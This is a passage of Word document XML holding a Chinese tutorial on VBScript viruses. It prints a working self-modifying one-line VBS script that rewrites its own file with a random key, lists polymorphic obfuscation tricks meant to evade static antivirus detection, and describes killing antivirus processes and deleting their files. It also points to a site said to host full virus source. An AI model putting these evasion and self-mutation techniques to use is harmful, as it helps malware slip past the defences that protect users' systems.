        <w:t>str="wscript.echo""OK!"":randomize:key=int(rnd*8+2):str=rev:str=replace(str,chr(34),chr(34)+chr(34)):set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aso=crea</w:t>
      </w:r>
      <w:r>
        <w:t>teobject(""ADODB.Stream""):with aso:.open:.writetext</w:t>
      </w:r>
      <w:r>
        <w:t>""str=""+chr(34)+str+chr(34)+"":key=""+cstr(key)+"":str=rev:execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>str:function rev():for i=1 t</w:t>
      </w:r>
      <w:r w:rsidR="00156BC9">
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:r>
        <w:t>len(str) step key:rev=rev+strrevrse(mid(str,i,key)):next:end</w:t>
      </w:r>
      <w:r w:rsidR="00413BAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>function"":.savetofile</w:t>
      </w:r>
      <w:r w:rsidR="00413BAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00156BC9">
        <w:t xml:space="preserve">wscript.scriptfullname,2:end </w:t>
      </w:r>
      <w:r>
        <w:t>with":key=1:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意的是，上面的代码只有一行，没有回车换行，他的效果和上一段代码是一样的，弹出一个对话框现实</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OK</w:t>
      </w:r>
      <w:r w:rsidR="003C0709">
        <w:t>！。但是</w:t>
      </w:r>
      <w:r>
        <w:t>代码执行完后，可能就变成下面这样的内容了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>str=".tpircswKO""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ohceodnar:""!yek:ezimdnr(tni=ts:)2+8*ts:vet=rcalper=rhc,rts(ehc,)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>43(rhc+)43(rs:))43(rc=osa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>tejboetaerODA""(tceaertS.BDhtiw:)""mpo.:osa tirw.:nes""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>txeterhc+""=rtrts+)43()43(rhc+""=yek:""+ek(rtsc+rts+ver=(esrever,rts(dim:))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>yek,idne:txenoitcnuf evas.:""nw elifots.tpircsluftpirc:2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>emanlgiw dne"key=8:str=rev:execute str:function rev():for i=1 to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每次运行之后，代码都变成了不同的内容，也就是说这个脚本是自变形的。这个壳的算法没有变，但是</w:t>
      </w:r>
      <w:r>
        <w:t>n确是随机改变。但是</w:t>
      </w:r>
      <w:r>
        <w:t>加过壳的内容每次都不同，壳本身还没有任何改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变。为了更好的免杀，脚本的壳也可以动态改变，这就要用到所谓的多态技术了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45828" w:rsidRDefault="00F45828" w:rsidP="00F45828">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>EXE病毒不同的是，</w:t>
      </w:r>
      <w:r>
        <w:t>EXE</w:t>
      </w:r>
      <w:r>
        <w:t>病毒多态是用来反动态查杀的，而脚本的多态只是对付静</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>态查杀</w:t>
      </w:r>
      <w:r w:rsidR="00876000">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，两者存在的差异比较大。不影响功能的变形方法，除了上面介绍的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205258" w:rsidRDefault="00205258" w:rsidP="00EE0892">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）</w:t>
      </w:r>
      <w:r w:rsidR="00F45828">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机改变大小写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205258" w:rsidRDefault="00205258" w:rsidP="00EE0892">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>冒号</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:t>(:)与回车符随机互换(字符串内和</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:t>then</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:t>之后的冒号除外)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0892" w:rsidRDefault="00205258" w:rsidP="00EE0892">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3）</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串分割时，“</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:t>+”与“&amp;”随机互换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0892" w:rsidRDefault="00205258" w:rsidP="00EE0892">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:t>()、+、-、*、/、&amp;等字符两边任意添加空格或继续符(_)和回车符的组合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37E21" w:rsidRPr="00230801" w:rsidRDefault="00205258" w:rsidP="00F37E21">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00EE0892">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用自定义函数替换内置函数，即使自定义的函数只是简单的封装内置函数，但至少起到了减少关键字的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C3CD5" w:rsidRDefault="007C3CD5" w:rsidP="007C3CD5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3CD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>直接关闭杀毒软件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37E21" w:rsidRDefault="00F37E21" w:rsidP="00F37E21">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>VBS</w:t>
      </w:r>
      <w:r w:rsidR="00CC682E">
        <w:t>的功能非常的强大，它可以直接</w:t>
      </w:r>
      <w:r w:rsidR="00CC682E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查</w:t>
      </w:r>
      <w:r w:rsidR="00BF3263">
        <w:t>看系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37E21">
        <w:t>运行的进程，如果发现是杀毒软件的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37E21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程，那么就直接关闭它，并对它的某些关键程序进行删除，让杀毒软件无法运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37E21" w:rsidRDefault="00F37E21" w:rsidP="00F37E21">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37E21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以综合应用“语句分割”、“变量名自动改变”、“随机改变大小写”、“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37E21">
        <w:t>+和&amp;互换”等</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37E21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，从而达到类似于在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37E21">
        <w:t xml:space="preserve"> JAVA 中的混淆器的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006545AC" w:rsidRDefault="00BF3263" w:rsidP="00BF3263">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户一旦浏览了含有病毒的网页，即可在毫无察觉的情况下立即感染该病毒，从而对系</w:t>
      </w:r>
      <w:r w:rsidR="006545AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统造成不同程度的破坏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3263" w:rsidRDefault="00BF3263" w:rsidP="00127732">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="006545AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认主页被修改；主页设置被屏幕锁定，沙子选项无效不可更改；默认的</w:t>
      </w:r>
      <w:r w:rsidR="00AB247E">
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>搜索引擎被修改；</w:t>
      </w:r>
      <w:r w:rsidR="00AB247E">
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏添加非法信息；</w:t>
      </w:r>
      <w:r w:rsidR="009D16D7">
        <w:t>outlook express</w:t>
      </w:r>
      <w:r>
        <w:t>标题栏被添加非法信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>息；鼠标右键菜单被添加非法网站链接；在</w:t>
      </w:r>
      <w:r w:rsidR="009D16D7">
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>工具栏非法添加按钮；锁定地址栏的下拉菜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单并添加文字信息；</w:t>
      </w:r>
      <w:r>
        <w:t>IE 菜单“查看”下的“源文件”项被禁止。以上都是网页病毒的一般</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表现，更恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的网页则是破坏文件系统，或自动安装木马程序等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5B22" w:rsidRDefault="005F5B22" w:rsidP="005F5B22">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>至于完整的脚本病毒或其他病毒的代码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大家可以去</w:t>
      </w:r>
      <w:r>
        <w:t>ht</w:t>
      </w:r>
      <w:r w:rsidR="00014FEF">
        <w:t>tp://www.62nds.co.nz/pg/e90.php</w:t>
      </w:r>
      <w:r>
        <w:t>这个网站看看。它里面收集了一些病毒的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完整代码，可以供大家研究之用。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005F5B22" w:rsidSect="004F14E9">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BD9" w:rsidRDefault="00767BD9" w:rsidP="00D67CD3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00D67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BD9" w:rsidRDefault="00767BD9" w:rsidP="00D67CD3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00767BD9" w:rsidRDefault="00767BD9" w:rsidP="00D67C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16F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3A6E6BE"/>
    <w:lvl w:ilvl="0" w:tplc="D9CC1D1A">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033F6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3460D430"/>
    <w:lvl w:ilvl="0" w:tplc="C7C8E364">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>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16244C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="572C9032"/>
    <w:lvl w:ilvl="0" w:tplc="6CFC6966">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>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818B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DBE4DA2"/>
    <w:lvl w:ilvl="0" w:tplc="DBBA1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E2458E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77F460DE"/>
    <w:lvl w:ilvl="0" w:tplc="469097E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91534B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5238B472"/>
    <w:lvl w:ilvl="0" w:tplc="A60A8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5A5C7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBCAB7D0"/>
    <w:lvl w:ilvl="0" w:tplc="09041D0C">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579"/>
    <w:rsid w:val="00014FEF"/>
    <w:rsid w:val="00025DC7"/>
    <w:rsid w:val="00085EFD"/>
    <w:rsid w:val="00092A72"/>
    <w:rsid w:val="00092F42"/>
    <w:rsid w:val="00100611"/>
    <w:rsid w:val="00101AA6"/>
    <w:rsid w:val="00127732"/>
    <w:rsid w:val="001465EE"/>
    <w:rsid w:val="001476C2"/>
    <w:rsid w:val="00147D51"/>
    <w:rsid w:val="00155120"/>
    <w:rsid w:val="00156BC9"/>
    <w:rsid w:val="00164F64"/>
    <w:rsid w:val="00175A28"/>
    <w:rsid w:val="00191ABB"/>
    <w:rsid w:val="00192BFB"/>
    <w:rsid w:val="001A2531"/>
    <w:rsid w:val="001E1F9F"/>
    <w:rsid w:val="00205258"/>
    <w:rsid w:val="00230801"/>
    <w:rsid w:val="00260E5A"/>
    <w:rsid w:val="002627A0"/>
    <w:rsid w:val="0029531C"/>
    <w:rsid w:val="0032020E"/>
    <w:rsid w:val="00357CE0"/>
    <w:rsid w:val="00377F59"/>
    <w:rsid w:val="003B17CF"/>
    <w:rsid w:val="003B38B6"/>
    <w:rsid w:val="003C0709"/>
    <w:rsid w:val="003E1E9A"/>
    <w:rsid w:val="003E3E34"/>
    <w:rsid w:val="00413BAF"/>
    <w:rsid w:val="00433AFA"/>
    <w:rsid w:val="00482673"/>
    <w:rsid w:val="0048656B"/>
    <w:rsid w:val="004A1E1E"/>
    <w:rsid w:val="004A33C8"/>
    <w:rsid w:val="004A3EA0"/>
    <w:rsid w:val="004B48F6"/>
    <w:rsid w:val="004D0073"/>
    <w:rsid w:val="004F0778"/>
    <w:rsid w:val="004F14E9"/>
    <w:rsid w:val="005504E2"/>
    <w:rsid w:val="0057203C"/>
    <w:rsid w:val="005843E6"/>
    <w:rsid w:val="00593A24"/>
    <w:rsid w:val="00596E03"/>
    <w:rsid w:val="005A77DB"/>
    <w:rsid w:val="005E09F3"/>
    <w:rsid w:val="005F5B22"/>
    <w:rsid w:val="0063798A"/>
    <w:rsid w:val="006545AC"/>
    <w:rsid w:val="006C1AE4"/>
    <w:rsid w:val="006D2288"/>
    <w:rsid w:val="006E352D"/>
    <w:rsid w:val="007343F5"/>
    <w:rsid w:val="00736DF3"/>
    <w:rsid w:val="007473BA"/>
    <w:rsid w:val="00767BD9"/>
    <w:rsid w:val="00770240"/>
    <w:rsid w:val="007929C4"/>
    <w:rsid w:val="007B48B0"/>
    <w:rsid w:val="007C3CD5"/>
    <w:rsid w:val="007D4579"/>
    <w:rsid w:val="007F029E"/>
    <w:rsid w:val="0080155F"/>
    <w:rsid w:val="008337ED"/>
    <w:rsid w:val="008417AF"/>
    <w:rsid w:val="00876000"/>
    <w:rsid w:val="00885B5C"/>
    <w:rsid w:val="0089099D"/>
    <w:rsid w:val="008A4BD8"/>
    <w:rsid w:val="008C2F20"/>
    <w:rsid w:val="008D48C3"/>
    <w:rsid w:val="008D6282"/>
    <w:rsid w:val="0093276F"/>
    <w:rsid w:val="00987803"/>
    <w:rsid w:val="009D16D7"/>
    <w:rsid w:val="00A77088"/>
    <w:rsid w:val="00A84498"/>
    <w:rsid w:val="00AB1BFE"/>
    <w:rsid w:val="00AB1DE4"/>
    <w:rsid w:val="00AB247E"/>
    <w:rsid w:val="00AC425E"/>
    <w:rsid w:val="00BD1EE2"/>
    <w:rsid w:val="00BF3263"/>
    <w:rsid w:val="00C30B90"/>
    <w:rsid w:val="00C359B5"/>
    <w:rsid w:val="00C63CC4"/>
    <w:rsid w:val="00C6550D"/>
    <w:rsid w:val="00C879FC"/>
    <w:rsid w:val="00CC682E"/>
    <w:rsid w:val="00CC7907"/>
    <w:rsid w:val="00CD4798"/>
    <w:rsid w:val="00D3793D"/>
    <w:rsid w:val="00D474D2"/>
    <w:rsid w:val="00D67CD3"/>
    <w:rsid w:val="00D840F3"/>
    <w:rsid w:val="00DA128D"/>
    <w:rsid w:val="00DA1BDE"/>
    <w:rsid w:val="00DF7CF7"/>
    <w:rsid w:val="00E12D30"/>
    <w:rsid w:val="00E14C22"/>
    <w:rsid w:val="00E54F3F"/>
    <w:rsid w:val="00E75632"/>
    <w:rsid w:val="00E96495"/>
    <w:rsid w:val="00EB43CC"/>
    <w:rsid w:val="00EE0892"/>
    <w:rsid w:val="00EE6DF3"/>
    <w:rsid w:val="00EF0F32"/>
    <w:rsid w:val="00F02A8B"/>
    <w:rsid w:val="00F37E21"/>
    <w:rsid w:val="00F45828"/>
    <w:rsid w:val="00F45B51"/>
    <w:rsid w:val="00F45DA0"/>
    <w:rsid w:val="00F541E6"/>
    <w:rsid w:val="00F61D65"/>
    <w:rsid w:val="00FC6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26DE6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{05688522-8F82-4D43-B3BB-1A6D7B9B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7CD3"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D3793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D67CD3"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D67C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67CD3"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D67CD3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D67CD3"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D3793D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00164F64"/>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164F64"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="aa">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00CD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1857</Words>
  <Characters>10585</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>88</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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LGY</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LGY</cp:lastModifiedBy>
  <cp:revision>121</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-31T08:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-31T11:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>